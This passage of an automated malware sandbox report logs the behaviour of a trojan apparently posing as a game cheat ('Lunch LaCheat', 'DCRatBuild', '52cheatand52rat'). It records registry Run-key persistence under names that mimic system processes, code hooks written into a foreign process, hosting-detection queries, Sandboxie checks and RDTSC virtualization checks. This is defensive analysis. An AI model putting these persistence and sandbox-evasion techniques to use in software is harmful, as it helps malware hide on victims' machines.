                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SgrmBroker
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL
                        Source: C:\blockweb\portrefNet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 1C60005 value: E9 2B BA 26 75 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 76ECBA30 value: E9 DA 45 D9 8A Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 1DC0008 value: E9 8B 8E 15 75 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 76F18E90 value: E9 80 71 EA 8A Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 2020005 value: E9 8B 4D BD 73 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 75BF4D90 value: E9 7A B2 42 8C Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 2040005 value: E9 EB EB BC 73 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 75C0EBF0 value: E9 1A 14 43 8C Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 2050005 value: E9 8B 8A F8 72 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 74FD8A90 value: E9 7A 75 07 8D Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 2060005 value: E9 2B 02 FA 72 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 75000230 value: E9 DA FD 05 8D Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 2070005 value: E9 8B 2F E9 74 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 76F02F90 value: E9 7A D0 16 8B Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 2080007 value: E9 EB DF EB 74 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeMemory written: PID: 7344 base: 76F3DFF0 value: E9 1E 20 14 8B Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 1970005 value: E9 2B BA 55 75 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 76ECBA30 value: E9 DA 45 AA 8A Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 1980008 value: E9 8B 8E 59 75 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 76F18E90 value: E9 80 71 A6 8A Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 1A90005 value: E9 8B 4D 16 74 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 75BF4D90 value: E9 7A B2 E9 8B Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 3680005 value: E9 EB EB 58 72 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 75C0EBF0 value: E9 1A 14 A7 8D Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 3690005 value: E9 8B 8A 94 71 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 74FD8A90 value: E9 7A 75 6B 8E Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 36A0005 value: E9 2B 02 96 71 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 75000230 value: E9 DA FD 69 8E Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 36B0005 value: E9 8B 2F 85 73 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 76F02F90 value: E9 7A D0 7A 8C Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 36C0007 value: E9 EB DF 87 73 Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeMemory written: PID: 7972 base: 76F3DFF0 value: E9 1E 20 78 8C Jump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\blockweb\portrefNet.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: Lunch LaCheatV2.exe, 00000001.00000002.1767574867.0000000000408000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: Q|SBIEDLL.DLL
                        Source: Lunch LaCheat.exe, 00000022.00000002.1811959348.0000000000408000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: )SBIEDLL.DLL
                        Tries to detect virtualization through RDTSC time measurements
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: 1ACE14C second address: 1ACE156 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: FCCA9E second address: FCCAA4 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: FA93AB second address: FA93BE instructions: 0x00000000 rdtsc 0x00000002 sub dx, 35C4h 0x00000007 xor cl, FFFFFFD9h 0x0000000a cmc 0x0000000b sub cl, 00000014h 0x0000000e bswap eax 0x00000010 cwde 0x00000011 not cl 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: 10396D7 second address: 10396EF instructions: 0x00000000 rdtsc 0x00000002 bsf dx, bx 0x00000006 test esp, 7F476D6Bh 0x0000000c xor cl, FFFFFFA9h 0x0000000f not dh 0x00000011 xor bl, cl 0x00000013 btc eax, FFFFFFACh 0x00000017 push ebp 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: F79280 second address: 1B3CCA7 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 04DA974Eh 0x00000008 call 00007F5F24BCA93Fh 0x0000000d push ebx 0x0000000e not bl 0x00000010 seto bh 0x00000013 push edx 0x00000014 cwd 0x00000016 push eax 0x00000017 push esi 0x00000018 cmovnb si, bp 0x0000001c pushfd 0x0000001d cwde 0x0000001e cmovns esi, ebx 0x00000021 cdq 0x00000022 push ebp 0x00000023 xchg esi, esi 0x00000025 push ecx 0x00000026 dec cl 0x00000028 not eax 0x0000002a push edi 0x0000002b inc bl 0x0000002d mov ecx, 00000000h 0x00000032 cdq 0x00000033 cwde 0x00000034 push ecx 0x00000035 mov dx, bp 0x00000038 lahf 0x00000039 cbw 0x0000003b mov edi, dword ptr [esp+28h] 0x0000003f setns bh 0x00000042 cmovns dx, bp 0x00000046 inc esi 0x00000047 inc edi 0x00000048 ror ebp, FFFFFF84h 0x0000004b xor edi, 352C7E3Bh 0x00000051 or bp, ax 0x00000054 shld ebp, ecx, 000000DBh 0x00000058 neg edi 0x0000005a bt ebx, ebp 0x0000005d btc ax, FFDCh 0x00000062 lea edi, dword ptr [edi+32E32BBDh] 0x00000068 and bh, dl 0x0000006a shld eax, ecx, 0000003Bh 0x0000006e lea edi, dword ptr [edi+ecx] 0x00000071 jmp 00007F5F257E2C1Ah 0x00000076 mov ebp, esp 0x00000078 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: E98A5F second address: E98A69 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeRDTSC instruction interceptor: First address: E1951C second address: E19522 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeRDTSC instruction interceptor: First address: 16DB1F3 second address: 174113A instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 rol cl, 1 0x00000006 shrd dx, bp, 00000038h 0x0000000b or dx, 3F3Eh 0x00000010 add cl, 0000001Ah 0x00000013 jmp 00007F5F24C57122h 0x00000018 neg cl 0x0000001a rdtsc
